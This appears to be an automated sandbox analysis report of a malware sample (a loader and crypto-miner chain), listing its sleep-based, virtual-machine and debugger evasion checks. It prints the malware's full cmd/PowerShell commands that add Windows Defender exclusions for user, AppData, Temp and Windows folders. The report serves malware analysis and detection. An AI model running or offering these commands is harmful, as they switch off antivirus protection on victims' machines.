Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6904	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 6868	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 3748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep count: 8604 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep count: 492 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452	Thread sleep count: 579 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599803s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452	Thread sleep count: 1064 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599552s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2812	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 7896	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 1984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412	Thread sleep count: 9208 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 6049 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 3564 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6712	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep count: 7996 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep count: 1373 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep count: 6750 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep count: 2914 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396	Thread sleep time: -6456360425798339s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00402218 GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetComputerNameA,GetComputerNameA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,sprintf,printf,

7_2_00402218

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599854
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599716
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599285
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599127
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598988
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598850
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599803
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599552
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599436
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599327
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: svchost64.exe, 00000095.00000002.2843997051.0000000000598000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.dr	Binary or memory string: IsVirtualMachine
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2950307615.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2577066128.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2843755674.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2436766433.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358096287.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2400016250.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.dr	Binary or memory string: CheckForVirtualMachine
Source: file.exe, 00000000.00000002.1763073628.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1789659705.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1789484442.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: miner2.0.exe, 00000055.00000002.2679277773.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: curl.exe, 0000000A.00000003.2354085567.00000212B53C6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000003.2618645292.000001DFDEF56000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2793628082.000000001E4E4000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2853167790.000000001DFCA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04CC01E6 Start: 04CC0289 End: 04CC01B2		0_2_04CC01E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04CC0189 Start: 04CC0289 End: 04CC01B2		0_2_04CC0189

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CC0942 rdtsc

0_2_04CC0942

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,

7_2_00401B3F

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C5645B mov eax, dword ptr fs:[00000030h]		6_2_00C5645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C5A1C2 mov eax, dword ptr fs:[00000030h]		6_2_00C5A1C2

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,GetStartupInfoA,		7_2_00401180
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00402D90 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		7_2_00402D90

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
